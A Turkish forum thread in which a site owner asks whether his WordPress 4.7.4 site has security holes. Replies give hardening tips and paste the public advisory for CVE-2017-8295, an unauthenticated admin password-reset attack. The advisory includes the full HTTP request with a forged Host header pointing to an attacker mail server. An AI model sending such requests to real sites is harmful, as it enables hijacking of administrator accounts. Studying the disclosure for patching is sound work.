sitemin açığı var mı?

kemalbat · 5 May 2017

1-)Sitemde herhangi bir güvenlik açığı var mı?
2-)Varsa nasıl düzeltebilirim?
3-)Site hakkında tavsiye vermek isterseniz..

Site Linki

N0XI · 5 May 2017

Site hangi panel kullanıyor wp mi

kemalbat · 5 May 2017

N0XI' Alıntı:
Site hangi panel kullanıyor wp mi

evet wordpress kullanıyor

N0XI · 5 May 2017

kemalbat' Alıntı:
N0XI' Alıntı:

Site hangi panel kullanıyor wp mi

Genişletmek için tıkla ...

evet wordpress kullanıyor

Hocam hep güncellendimi panel anında güncelle eskı surumlerde acıklar tespıt edılıyor dıkkatlı ol bi özel gelebılrmsn

TurKLoJeN · 6 May 2017

Wordpress sürümün nedir ?

byLanet · 6 May 2017

Muhtemelen güzel açıklar vardır bir dene istersen

kemalbat · 6 May 2017

TurKLoJeN' Alıntı:
Wordpress sürümün nedir ?

WordPress 4.7.4 hocam

TurKLoJeN · 6 May 2017

kemalbat' Alıntı:
TurKLoJeN' Alıntı:

Wordpress sürümün nedir ?

Genişletmek için tıkla ...

WordPress 4.7.4 hocam

Kod:

WordPress < 4.7.4 - Unauthorized Password Reset

=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
 
- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================
 
Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 
If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):
 
-----[ HTTP Request ]----
 
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
 
user_login=admin&redirect_to=&wp-submit=Get+New+Password
 
------------------------
 
 
Wordpress will trigger the password reset function for the admin user account.
 
Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:
 
 
------[ resulting e-mail ]-----
 
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
 
Someone requested that the password be reset for the following account:
 
http://companyX-wp/wp/wordpress/
 
Username: admin
 
If this was a mistake, just ignore this email and nothing will happen.
 
To reset your password, visit the following address:
 
<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
 
-------------------------------
 
 
As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.
 
 
The verification of the headers can be performed by replacing /usr/sbin/sendmail with a 
bash script of:
 
#!/bin/bash
cat > /tmp/outgoing-email

Exploit Anasayfa

chagataii · 9 May 2017

https://www.kemalbatinyildirim.com.....kemalbatinyildirim.com.tr/wp-admin/&reauth=1 sql inject icin linkleri gizli yap default şifre kullanma default admini sil admin klasorünü şifrele admin panelin linkini degistir yonlendirmelerden sil aklıma gelen olursa söylerim daha

Ara

sitemin açığı var mı?

kemalbat

*Vıp Projection

N0XI

Spys-Z

kemalbat

*Vıp Projection

N0XI

Spys-Z

TurKLoJeN

Özel Üye

byLanet

Moderator

kemalbat

*Vıp Projection

TurKLoJeN

Özel Üye

chagataii

Yeni Üye